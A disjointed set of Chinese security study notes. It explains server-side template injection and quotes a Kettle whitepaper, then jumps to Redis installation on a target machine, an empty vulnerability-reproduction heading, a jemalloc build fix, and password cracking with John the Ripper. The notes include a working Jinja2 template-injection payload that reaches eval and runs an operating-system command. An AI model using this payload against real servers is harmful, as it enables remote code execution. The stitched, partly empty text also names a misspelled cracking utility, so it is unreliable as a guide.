服务端模板注入(SSTI):服务端接收了用户的输入,将其作为 Web 应用模板内容的一部分,在进行目标编译渲染的过程中,若用户插入了相关恶意内容,结果可能导致了敏感信息泄露、代码执行、GetShell 等问题,所以永远不要相信用户输入。
Template engines are widely used by web applications to present dynamic data via web pages and emails. Unsafely embedding user input in templates enables Server-Side Template Injection, a frequently critical vulnerability that is extremely easy to mistake for Cross-Site Scripting (XSS), or miss entirely. Unlike XSS, Template Injection can be used to directly attack web servers’ internals and often obtain Remote Code Execution (RCE), turning every vulnerable application into a potential pivot point.[from us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp]
{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% if b.__class__ == {}.__class__ %} {% if 'eval' in b.keys() %} {{ b['eval']('__import__("os").popen("ls").read()') }} {% endif %} {% endif %} {% endfor %} {% endif %} {% endfor %}
#靶机:CentOS7.0 #CentOS安装redis wget http://download.redis.io/releases/redis-3.2.0.tar.gz tar xzf redis-3.2.0.tar.gz cd redis-3.2.0 make
0x03 漏洞复现
0x04 填坑过程
安装Redis-3.2.0时报错:
make[1]: Entering directory `/home/fanson/redis-3.2.0/src’ CC adlist.o In file included from adlist.c:34:0: zmalloc.h:50:31: fatal error: jemalloc/jemalloc.h: No such file or directory
Selecting a non-default memory allocator when building Redis is done by setting the MALLOC environment variable. Redis is compiled and linked against libc malloc by default, with the exception of jemalloc being the default on Linux systems. This default was picked because jemalloc has proven to have fewer fragmentation problems than libc malloc. To force compiling against libc malloc, use:
make MALLOC=libc
To compile against jemalloc on Mac OS X systems, use:
工具爆破:John the Ripper (“JtR”) 是一个非常有用的工具。这是一个快速的密码破解器,适用于Windows和许多Linux系统。它具有很多功能,对于很多密码破解均有奇效。JtR破解的文件必须有特定的格式。要转换passwd和shadow文件,我们需要利用/usr/sbin/unshade可执行文件。这需要超级用户权限才能执行。